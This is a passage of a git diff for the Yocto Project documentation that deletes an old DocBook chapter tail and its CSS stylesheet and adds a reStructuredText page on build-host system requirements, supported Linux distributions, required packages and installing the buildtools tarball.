-
-        <para>
-            This directory contains package and image recipes for using and testing
-            the <filename>PREEMPT_RT</filename> kernel.
-        </para>
-    </section>
-
-    <section id='structure-meta-recipes-sato'>
-        <title><filename>meta/recipes-sato/</filename></title>
-
-        <para>
-            This directory contains the Sato demo/reference UI/UX and its associated applications
-            and configuration data.
-        </para>
-    </section>
-
-    <section id='structure-meta-recipes-support'>
-        <title><filename>meta/recipes-support/</filename></title>
-
-        <para>
-            This directory contains recipes used by other recipes, but that are
-            not directly included in images (i.e. dependencies of other
-            recipes).
-        </para>
-    </section>
-
-    <section id='structure-meta-site'>
-        <title><filename>meta/site/</filename></title>
-
-        <para>
-            This directory contains a list of cached results for various architectures.
-            Because certain "autoconf" test results cannot be determined when cross-compiling due to
-            the tests not able to run on a live system, the information in this directory is
-            passed to "autoconf" for the various architectures.
-        </para>
-    </section>
-
-    <section id='structure-meta-recipes-txt'>
-        <title><filename>meta/recipes.txt</filename></title>
-
-        <para>
-            This file is a description of the contents of <filename>recipes-*</filename>.
-        </para>
-    </section>
-</section>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-style.css b/documentation/ref-manual/ref-style.css
deleted file mode 100644
index 7077e4b70d..0000000000
--- a/documentation/ref-manual/ref-style.css
+++ /dev/null
@@ -1,1032 +0,0 @@
-/*
-   Generic XHTML / DocBook XHTML CSS Stylesheet.
-
-   Browser wrangling and typographic design by
-      Oyvind Kolas / pippin@gimp.org
-
-   Customised for Poky by
-      Matthew Allum / mallum@o-hand.com
-
-   Thanks to:
-     Liam R. E. Quin
-     William Skaggs
-     Jakub Steiner
-
-   Structure
-   ---------
-
-   The stylesheet is divided into the following sections:
-
-       Positioning
-          Margins, paddings, width, font-size, clearing.
-       Decorations
-          Borders, style
-       Colors
-          Colors
-       Graphics
-          Graphical backgrounds
-       Nasty IE tweaks
-          Workarounds needed to make it work in internet explorer,
-          currently makes the stylesheet non validating, but up until
-          this point it is validating.
-       Mozilla extensions
-          Transparency for footer
-	  Rounded corners on boxes
-
-*/
-
-
-  /*************** /
- /  Positioning   /
-/ ***************/
-
-body {
-  font-family: Verdana, Sans, sans-serif;
-
-  min-width: 640px;
-  width: 80%;
-  margin:  0em auto;
-  padding: 2em 5em 5em 5em;
-  color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
-  font-family: Arial, Sans;
-  color: #00557D;
-  clear: both;
-}
-
-h1 {
-  font-size: 2em;
-  text-align: left;
-  padding: 0em 0em 0em 0em;
-  margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
-  margin: 0.10em 0em 3.0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 1.8em;
-  padding-left: 20%;
-  font-weight: normal;
-  font-style: italic;
-}
-
-h2 {
-  margin: 2em 0em 0.66em 0em;
-  padding: 0.5em 0em 0em 0em;
-  font-size: 1.5em;
-  font-weight: bold;
-}
-
-h3.subtitle {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 142.14%;
-  text-align: right;
-}
-
-h3 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 140%;
-  font-weight: bold;
-}
-
-h4 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 120%;
-  font-weight: bold;
-}
-
-h5 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-h6 {
-  margin: 1em 0em 0em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-.authorgroup {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  padding-top: 256px;
-  background-image: url("figures/poky-title.png");
-  background-position: left top;
-  margin-top: -256px;
-  padding-right: 50px;
-  margin-left: 0px;
-  text-align: right;
-  width: 740px;
-}
-
-h3.author {
-  margin: 0em 0me 0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-weight: normal;
-  font-size: 100%;
-  color: #333;
-  clear: both;
-}
-
-.author tt.email {
-  font-size: 66%;
-}
-
-.titlepage hr {
-  width: 0em;
-  clear: both;
-}
-
-.revhistory {
-  padding-top: 2em;
-  clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
-  padding: 1.33em 0em 2.5em 0em;
-  color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
-  padding: 0em 0em 0em 0em;
-  padding: 0em 0em 0.3em;
-  margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
-  font-size: 100.0%;
-  font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
-  margin: 0em 0em 0.5em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
-  margin: 0em 0em 0em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
-  margin: 0em 0em 0em 2.6em;
-  padding: 0em 0em 0em 0em;
-}
-
-/* Use this set when you decide to get the images in for variables.
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  font-weight: normal;
-  width: 0em;
-  text-align: right;
-}
-
-.variablelist dl dt {
-  margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
-  margin-top: 0em;
-  margin-left: 15.5em;
-  margin-bottom: 2em;
-}
-
-.glossary dd p,
-.variablelist dd p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-.glossdeffirst {
-  text-indent: -70px;
-}
-*/
-
-/* Start of non-image set */
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  font-weight: normal;
-  width: 20em;
-  text-align: right;
-}
-
-.variablelist dl dt {
-  margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
-  margin-top: 0em;
-  margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-.glossdeffirst {
-  text-indent: 0px;
-}
-
-/* End of non-image set */
-
-div.calloutlist table td {
-  padding: 0em 0em 0em 0em;
-  margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-div p.copyright {
-  text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
-  margin-bottom: 0em;
-}
-
-p {
-  line-height: 1.5em;
-  margin-top: 0em;
-
-}
-
-dl {
-  padding-top: 0em;
-}
-
-hr {
-  border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
-  text-align: center;
-}
-
-img {
-  border: none;
-}
-
-ul {
-  padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
-  padding: 0em 0em 0em 0em;
-}
-
-ul li p {
-  text-align: left;
-}
-
-table {
-  width :100%;
-}
-
-th {
-  padding: 0.25em;
-  text-align: left;
-  font-weight: normal;
-  vertical-align: top;
-}
-
-td {
-  padding: 0.25em;
-  vertical-align: top;
-}
-
-p a[id] {
-  margin: 0px;
-  padding: 0px;
-  display: inline;
-  background-image: none;
-}
-
-a {
-  text-decoration: underline;
-  color: #444;
-}
-
-pre {
-    overflow: auto;
-}
-
-a:hover {
-  text-decoration: underline;
-  /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
-   appears by itself and when hovered over with
-   the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
-  margin: 1em 0em;
-  padding: 1em;
-  page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
-    padding-top: 0em;
-    margin-top: 0em;
-    font-size: 100%;
-    font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p  {
-  text-align: center;
-  font-size: 80%;
-  padding-top: 0.5em;
-  padding-bottom: 0.5em;
-}
-
-.epigraph {
-  padding-left: 55%;
-  margin-bottom: 1em;
-}
-
-.epigraph p {
-  text-align: left;
-}
-
-.epigraph .quote {
-  font-style: italic;
-}
-.epigraph .attribution {
-  font-style: normal;
-  text-align: right;
-}
-
-span.application {
-  font-style: italic;
-}
-
-.programlisting {
-  font-family: monospace;
-  font-size: 80%;
-  white-space: pre;
-  margin: 1.33em 0em;
-  padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
-  margin-top: 1em;
-  margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
-  border: none;
-  width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  padding: 0.8em 0.0em 0.0em 0.0em;
-  margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
-  margin-top: 0.5em;
-  margin-bottom: 0.5em;
-  padding-right: 1em;
-  text-align: left;
-}
-
-.acronym {
-  text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
-  padding: 0.09em 0.3em;
-  margin: 0em;
-}
-
-.itemizedlist li {
-  clear: none;
-}
-
-.filename {
-  font-size: medium;
-  font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
-  position: absolute;
-  left: 0em;
-  top: 0em;
-  width: 100%;
-  background-color: #cdf;
-  width: 100%;
-}
-
-div.navfooter, div.footing{
-  position: fixed;
-  left: 0em;
-  bottom: 0em;
-  background-color: #eee;
-  width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
-  font-size: 66%;
-}
-
-div.navheader table th {
-  /*font-family: Georgia, Times, serif;*/
-  /*font-size: x-large;*/
-  font-size: 80%;
-}
-
-div.navheader table {
-  border-left: 0em;
-  border-right: 0em;
-  border-top: 0em;
-  width: 100%;
-}
-
-div.navfooter table {
-  border-left: 0em;
-  border-right: 0em;
-  border-bottom: 0em;
-  width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
-  color: #777;
-  text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
-  color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
-  color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
-  text-decoration: underline;
-  background-color: transparent;
-  color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
-  display: none;
-}
-
-
-.qandaset tr.question td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-.answer td {
-  padding-bottom: 1.5em;
-}
-
-.emphasis {
-  font-weight: bold;
-}
-
-
-  /************* /
- / decorations  /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
-    border: none;
-}
-
-/*
-h1 {
-  border: none;
-}
-
-h2 {
-  border-top: solid 0.2em;
-  border-bottom: solid 0.06em;
-}
-
-h3 {
-  border-top: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h4 {
-  border: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h5 {
-  border: 0em;
-}
-*/
-
-.programlisting {
-  border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
-  border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
-  border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom: 1px solid;
-}
-
-.question td {
-  border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
-  border: 1px solid;
-}
-
-
-div.navheader, div.heading{
-  border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
-  border-top: 1px solid;
-}
-
-  /********* /
- /  colors  /
-/ *********/
-
-body {
-  color: #333;
-  background: white;
-}
-
-a {
-  background: transparent;
-}
-
-a:hover {
-  background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
-  background-color: transparent;
-}
-
-hr {
-  border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
-  border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom-color: #fff;
-}
-
-
-.warning {
-  background-color: #f0f0f2;
-}
-
-.caution {
-  background-color: #f0f0f2;
-}
-
-.tip {
-  background-color: #f0f0f2;
-}
-
-.note {
-  background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
-  border-color: #aaa;
-}
-
-pre.programlisting {
-  color: black;
-  background-color: #fff;
-  border-color: #aaa;
-  border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
-  background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
-  background-color: #eee;
-  border-color: #999;
-}
-
-
-div.navheader {
-  border-color: black;
-}
-
-
-div.navfooter {
-  border-color: black;
-}
-
-.writernotes {
-  color: red;
-}
-
-
-  /*********** /
- /  graphics  /
-/ ***********/
-
-/*
-body {
-  background-image: url("images/body_bg.jpg");
-  background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
-  background-image: url("images/note_bg.jpg");
-  background-attachment: fixed;
-}
-
-.warning,
-.caution {
-  background-image: url("images/warning_bg.jpg");
-  background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
-  background-image: url("images/figure_bg.jpg");
-  background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
-  background-image: url("figures/white-on-black.png");
-  background-position: center;
-  background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title,
-div.article .titlepage .title
-{
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
-    background: none;
-}
-
-
-h1.title {
-  background-color: transparent;
-  background-image: url("figures/poky-title.png");
-  background-repeat: no-repeat;
-  height: 256px;
-  text-indent: -9000px;
-  overflow:hidden;
-}
-
-h2.subtitle {
-  background-color: transparent;
-  text-indent: -9000px;
-  overflow:hidden;
-  width: 0px;
-  display: none;
-}
-
-  /*************************************** /
- /  pippin.gimp.org specific alterations  /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
-  color: #777;
-  font-size: 80%;
-  padding: 0;
-  margin: 0;
-  text-align: left;
-  position: absolute;
-  top: 0px;
-  left: 0px;
-  width: 100%;
-  height: 50px;
-  background: url('/gfx/heading_bg.png') transparent;
-  background-repeat: repeat-x;
-  background-attachment: fixed;
-  border: none;
-}
-
-div.heading a {
-  color: #444;
-}
-
-div.footing, div.navfooter {
-  border: none;
-  color: #ddd;
-  font-size: 80%;
-  text-align:right;
-
-  width: 100%;
-  padding-top: 10px;
-  position: absolute;
-  bottom: 0px;
-  left: 0px;
-
-  background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
-  /****************** /
- /  nasty ie tweaks  /
-/ ******************/
-
-/*
-div.heading, div.navheader {
-  width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
-  width:expression(document.body.clientWidth + "px");
-  margin-left:expression("-5em");
-}
-body {
-  padding:expression("4em 5em 0em 5em");
-}
-*/
-
-  /**************************************** /
- / mozilla vendor specific css extensions  /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
-  -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
-  -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
-  -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
-  display: none;
-}
-
-
-hr {
-  display: none;
-}
-
-table {
-  border: 0em;
-}
-
- .photo {
-  float: right;
-  margin-left:   1.5em;
-  margin-bottom: 1.5em;
-  margin-top: 0em;
-  max-width:      17em;
-  border:     1px solid gray;
-  padding:    3px;
-  background: white;
-}
- .seperator {
-   padding-top: 2em;
-   clear: both;
-  }
-
-  #validators {
-      margin-top: 5em;
-      text-align: right;
-      color: #777;
-  }
-  @media print {
-      body {
-          font-size: 8pt;
-      }
-      .noprint {
-          display: none;
-      }
-  }
-
-
-.tip,
-.note {
-   background: #f0f0f2;
-   color: #333;
-   padding: 20px;
-   margin: 20px;
-}
-
-.tip h3,
-.note h3 {
-   padding: 0em;
-   margin: 0em;
-   font-size: 2em;
-   font-weight: bold;
-   color: #333;
-}
-
-.tip a,
-.note a {
-   color: #333;
-   text-decoration: underline;
-}
-
-.footnote {
-   font-size: small;
-   color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
-   font-size:large;
-   color: #00557D;
-}
diff --git a/documentation/ref-manual/ref-system-requirements.rst b/documentation/ref-manual/ref-system-requirements.rst
new file mode 100644
index 0000000000..efb60e1009
--- /dev/null
+++ b/documentation/ref-manual/ref-system-requirements.rst
@@ -0,0 +1,475 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*******************
+System Requirements
+*******************
+
+Welcome to the Yocto Project Reference Manual! This manual provides
+reference information for the current release of the Yocto Project, and
+is most effectively used after you have an understanding of the basics
+of the Yocto Project. The manual is neither meant to be read as a
+starting point to the Yocto Project, nor read from start to finish.
+Rather, use this manual to find variable definitions, class
+descriptions, and so forth as needed during the course of using the
+Yocto Project.
+
+For introductory information on the Yocto Project, see the
+:yocto_home:`Yocto Project Website <>` and the
+":ref:`overview-manual/overview-manual-development-environment:the yocto project development environment`"
+chapter in the Yocto Project Overview and Concepts Manual.
+
+If you want to use the Yocto Project to quickly build an image without
+having to understand concepts, work through the
+:doc:`../brief-yoctoprojectqs/brief-yoctoprojectqs` document. You can find "how-to"
+information in the :doc:`../dev-manual/dev-manual`. You can find Yocto Project overview
+and conceptual information in the :doc:`../overview-manual/overview-manual`.
+
+.. note::
+
+   For more information about the Yocto Project Documentation set, see
+   the :ref:`ref-manual/resources:links and related documentation` section.
+
+.. _detailed-supported-distros:
+
+Supported Linux Distributions
+=============================
+
+Currently, the &DISTRO; release ("&DISTRO_NAME;") of the Yocto Project is
+supported on the following distributions:
+
+-  Ubuntu 20.04 (LTS)
+
+-  Ubuntu 22.04 (LTS)
+
+-  Fedora 38
+
+-  Debian GNU/Linux 11.x (Bullseye)
+
+-  AlmaLinux 8
+
+The following distribution versions are still tested even though the
+organizations publishing them no longer make updates publicly available:
+
+-  Ubuntu 18.04 (LTS)
+
+Finally, here are the distribution versions which were previously
+tested on former revisions of "&DISTRO_NAME;", but no longer are:
+
+-  Ubuntu 16.04 (LTS)
+
+-  Ubuntu 19.04
+
+-  Fedora 28
+
+-  Fedora 29
+
+-  Fedora 30
+
+-  Fedora 31
+
+-  Fedora 32
+
+-  Fedora 33
+
+-  Fedora 34
+
+-  Fedora 35
+
+-  Fedora 36
+
+-  Fedora 37
+
+-  CentOS 7.x
+
+-  CentOS 8.x
+
+-  Debian GNU/Linux 8.x (Jessie)
+
+-  Debian GNU/Linux 9.x (Stretch)
+
+-  Debian GNU/Linux 10.x (Buster)
+
+-  OpenSUSE Leap 15.1
+
+-  OpenSUSE Leap 15.2
+
+-  OpenSUSE Leap 15.3
+
+.. note::
+
+   -  While the Yocto Project Team attempts to ensure all Yocto Project
+      releases are one hundred percent compatible with each officially
+      supported Linux distribution, instances might exist where you
+      encounter a problem while using the Yocto Project on a specific
+      distribution.
+
+   -  Yocto Project releases are tested against the stable Linux
+      distributions in the above list. The Yocto Project should work
+      on other distributions but validation is not performed against
+      them.
+
+   -  In particular, the Yocto Project does not support and currently
+      has no plans to support rolling-releases or development
+      distributions due to their constantly changing nature. We welcome
+      patches and bug reports, but keep in mind that our priority is on
+      the supported platforms listed below.
+
+   -  You may use Windows Subsystem For Linux v2 to set up a build host
+      using Windows 10, but validation is not performed against build
+      hosts using WSLv2.
+
+   -  The Yocto Project is not compatible with WSLv1, it is
+      compatible but not officially supported nor validated with
+      WSLv2, if you still decide to use WSL please upgrade to WSLv2.
+
+   -  If you encounter problems, please go to :yocto_bugs:`Yocto Project
+      Bugzilla <>` and submit a bug. We are
+      interested in hearing about your experience. For information on
+      how to submit a bug, see the Yocto Project
+      :yocto_wiki:`Bugzilla wiki page </wiki/Bugzilla_Configuration_and_Bug_Tracking>`
+      and the ":ref:`dev-manual/dev-manual-common-tasks:submitting a defect against the yocto project`"
+      section in the Yocto Project Development Tasks Manual.
+
+
+Required Packages for the Build Host
+====================================
+
+The list of packages you need on the host development system can be
+large when covering all build scenarios using the Yocto Project. This
+section describes required packages according to Linux distribution and
+function.
+
+.. _ubuntu-packages:
+
+Ubuntu and Debian
+-----------------
+
+The following list shows the required packages by function given a
+supported Ubuntu or Debian Linux distribution:
+
+.. note::
+
+   -  If your build system has the ``oss4-dev`` package installed, you
+      might experience QEMU build failures due to the package installing
+      its own custom ``/usr/include/linux/soundcard.h`` on the Debian
+      system. If you run into this situation, either of the following
+      solutions exist:
+      ::
+
+         $ sudo apt-get build-dep qemu
+         $ sudo apt-get remove oss4-dev
+
+   -  For Debian-8, ``python3-git`` and ``pylint3`` are no longer
+      available via ``apt-get``.
+      ::
+
+         $ sudo pip3 install GitPython pylint==1.9.5
+
+-  *Essentials:* Packages needed to build an image on a headless system:
+   ::
+
+      $ sudo apt-get install &UBUNTU_HOST_PACKAGES_ESSENTIAL;
+
+-  *Documentation:* Packages needed if you are going to build out the
+   Yocto Project documentation manuals:
+   ::
+
+      $ sudo apt-get install make python3-pip
+      &PIP3_HOST_PACKAGES_DOC;
+
+   .. note::
+
+      It is currently not possible to build out documentation from Debian 8
+      (Jessie) because of outdated ``pip3`` and ``python3``. ``python3-sphinx``
+      is too outdated.
+
+Fedora Packages
+---------------
+
+The following list shows the required packages by function given a
+supported Fedora Linux distribution:
+
+-  *Essentials:* Packages needed to build an image for a headless
+   system:
+   ::
+
+      $ sudo dnf install &FEDORA_HOST_PACKAGES_ESSENTIAL;
+
+-  *Documentation:* Packages needed if you are going to build out the
+   Yocto Project documentation manuals:
+   ::
+
+      $ sudo dnf install make python3-pip which
+      &PIP3_HOST_PACKAGES_DOC;
+
+openSUSE Packages
+-----------------
+
+The following list shows the required packages by function given a
+supported openSUSE Linux distribution:
+
+-  *Essentials:* Packages needed to build an image for a headless
+   system:
+   ::
+
+      $ sudo zypper install &OPENSUSE_HOST_PACKAGES_ESSENTIAL;
+
+-  *Documentation:* Packages needed if you are going to build out the
+   Yocto Project documentation manuals:
+   ::
+
+      $ sudo zypper install make python3-pip which
+      &PIP3_HOST_PACKAGES_DOC;
+
+
+CentOS-7 Packages
+-----------------
+
+The following list shows the required packages by function given a
+supported CentOS-7 Linux distribution:
+
+-  *Essentials:* Packages needed to build an image for a headless
+   system:
+   ::
+
+      $ sudo yum install &CENTOS7_HOST_PACKAGES_ESSENTIAL;
+
+   .. note::
+
+      -  Extra Packages for Enterprise Linux (i.e. ``epel-release``) is
+         a collection of packages from Fedora built on RHEL/CentOS for
+         easy installation of packages not included in enterprise Linux
+         by default. You need to install these packages separately.
+
+      -  The ``makecache`` command consumes additional Metadata from
+         ``epel-release``.
+
+-  *Documentation:* Packages needed if you are going to build out the
+   Yocto Project documentation manuals:
+   ::
+
+      $ sudo yum install make python3-pip which
+      &PIP3_HOST_PACKAGES_DOC;
+
+CentOS-8 Packages
+-----------------
+
+The following list shows the required packages by function given a
+supported CentOS-8 Linux distribution:
+
+-  *Essentials:* Packages needed to build an image for a headless
+   system:
+   ::
+
+      $ sudo dnf install &CENTOS8_HOST_PACKAGES_ESSENTIAL;
+
+   .. note::
+
+      -  Extra Packages for Enterprise Linux (i.e. ``epel-release``) is
+         a collection of packages from Fedora built on RHEL/CentOS for
+         easy installation of packages not included in enterprise Linux
+         by default. You need to install these packages separately.
+
+      -  The ``PowerTools`` repo provides additional packages such as
+         ``rpcgen`` and ``texinfo``.
+
+      -  The ``makecache`` command consumes additional Metadata from
+         ``epel-release``.
+
+-  *Documentation:* Packages needed if you are going to build out the
+   Yocto Project documentation manuals:
+   ::
+
+      $ sudo dnf install make python3-pip which
+      &PIP3_HOST_PACKAGES_DOC;
+
+Required Git, tar, Python and gcc Versions
+==========================================
+
+In order to use the build system, your host development system must meet
+the following version requirements for Git, tar, and Python:
+
+-  Git 1.8.3.1 or greater
+
+-  tar 1.28 or greater
+
+-  Python 3.5.0 or greater
+
+If your host development system does not meet all these requirements,
+you can resolve this by installing a ``buildtools`` tarball that
+contains these tools. You can get the tarball one of two ways: download
+a pre-built tarball or use BitBake to build the tarball.
+
+In addition, your host development system must meet the following
+version requirement for gcc:
+
+-  gcc 5.0 or greater
+
+If your host development system does not meet this requirement, you can
+resolve this by installing a ``buildtools-extended`` tarball that
+contains additional tools, the equivalent of ``buildtools-essential``.
+
+Installing a Pre-Built ``buildtools`` Tarball with ``install-buildtools`` script
+--------------------------------------------------------------------------------
+
+The ``install-buildtools`` script is the easiest of the three methods by
+which you can get these tools. It downloads a pre-built buildtools
+installer and automatically installs the tools for you:
+
+1. Execute the ``install-buildtools`` script. Here is an example:
+   ::
+
+      $ cd poky
+      $ scripts/install-buildtools --without-extended-buildtools \
+        --base-url &YOCTO_DL_URL;/releases/yocto \
+        --release yocto-&DISTRO; \
+        --installer-version &DISTRO;
+
+   During execution, the buildtools tarball will be downloaded, the
+   checksum of the download will be verified, the installer will be run
+   for you, and some basic checks will be run to to make sure the
+   installation is functional.
+
+   To avoid the need of ``sudo`` privileges, the ``install-buildtools``
+   script will by default tell the installer to install in:
+   ::
+
+      /path/to/poky/buildtools
+
+   If your host development system needs the additional tools provided
+   in the ``buildtools-extended`` tarball, you can instead execute the
+   ``install-buildtools`` script with the default parameters:
+   ::
+
+      $ cd poky
+      $ scripts/install-buildtools
+
+2. Source the tools environment setup script by using a command like the
+   following:
+   ::
+
+      $ source /path/to/poky/buildtools/environment-setup-x86_64-pokysdk-linux
+
+   Of course, you need to supply your installation directory and be sure to
+   use the right file (i.e. i586 or x86_64).
+
+   After you have sourced the setup script, the tools are added to
+   ``PATH`` and any other environment variables required to run the
+   tools are initialized. The results are working versions versions of
+   Git, tar, Python and ``chrpath``. And in the case of the
+   ``buildtools-extended`` tarball, additional working versions of tools
+   including ``gcc``, ``make`` and the other tools included in
+   ``packagegroup-core-buildessential``.
+
+Downloading a Pre-Built ``buildtools`` Tarball
+----------------------------------------------
+
+Downloading and running a pre-built buildtools installer is the easiest
+of the two methods by which you can get these tools:
+
+1. Locate and download the ``*.sh`` at :yocto_dl:`/releases/yocto/&DISTRO_REL_TAG;/buildtools/`
+
+2. Execute the installation script. Here is an example for the
+   traditional installer:
+   ::
+
+      $ sh ~/Downloads/x86_64-buildtools-nativesdk-standalone-DISTRO.sh
+
+   Here is an example for the extended installer:
+   ::
+
+      $ sh ~/Downloads/x86_64-buildtools-extended-nativesdk-standalone-DISTRO.sh
+
+   During execution, a prompt appears that allows you to choose the
+   installation directory. For example, you could choose the following:
+   ``/home/your-username/buildtools``
+
+3. Source the tools environment setup script by using a command like the
+   following:
+   ::
+
+      $ source /home/your_username/buildtools/environment-setup-i586-poky-linux
+
+   Of
+   course, you need to supply your installation directory and be sure to
+   use the right file (i.e. i585 or x86-64).
+
+   After you have sourced the setup script, the tools are added to
+   ``PATH`` and any other environment variables required to run the
+   tools are initialized. The results are working versions versions of
+   Git, tar, Python and ``chrpath``. And in the case of the
+   ``buildtools-extended`` tarball, additional working versions of tools
+   including ``gcc``, ``make`` and the other tools included in
+   ``packagegroup-core-buildessential``.
+
+Building Your Own ``buildtools`` Tarball
+----------------------------------------
+
+Building and running your own buildtools installer applies only when you
+have a build host that can already run BitBake. In this case, you use
+that machine to build the ``.sh`` file and then take steps to transfer
+and run it on a machine that does not meet the minimal Git, tar, and
+Python (or gcc) requirements.
+
+Here are the steps to take to build and run your own buildtools
+installer:
+
+1. On the machine that is able to run BitBake, be sure you have set up
+   your build environment with the setup script
+   (:ref:`structure-core-script`).
+
+2. Run the BitBake command to build the tarball:
+   ::
+
+      $ bitbake buildtools-tarball
+
+   or run the BitBake command to build the extended tarball:
+   ::
+
+      $ bitbake buildtools-extended-tarball
+
+   .. note::
+
+      The :term:`SDKMACHINE` variable in your ``local.conf`` file determines
+      whether you build tools for a 32-bit or 64-bit system.
+
+   Once the build completes, you can find the ``.sh`` file that installs
+   the tools in the ``tmp/deploy/sdk`` subdirectory of the
+   :term:`Build Directory`. The installer file has the string
+   "buildtools" (or "buildtools-extended") in the name.
+
+3. Transfer the ``.sh`` file from the build host to the machine that
+   does not meet the Git, tar, or Python (or gcc) requirements.
+
+4. On the machine that does not meet the requirements, run the ``.sh``
+   file to install the tools. Here is an example for the traditional
+   installer:
+   ::
+
+      $ sh ~/Downloads/x86_64-buildtools-nativesdk-standalone-&DISTRO;.sh
+
+   Here is an example for the extended installer:
+   ::
+
+      $ sh ~/Downloads/x86_64-buildtools-extended-nativesdk-standalone-&DISTRO;.sh
+
+   During execution, a prompt appears that allows you to choose the
+   installation directory. For example, you could choose the following:
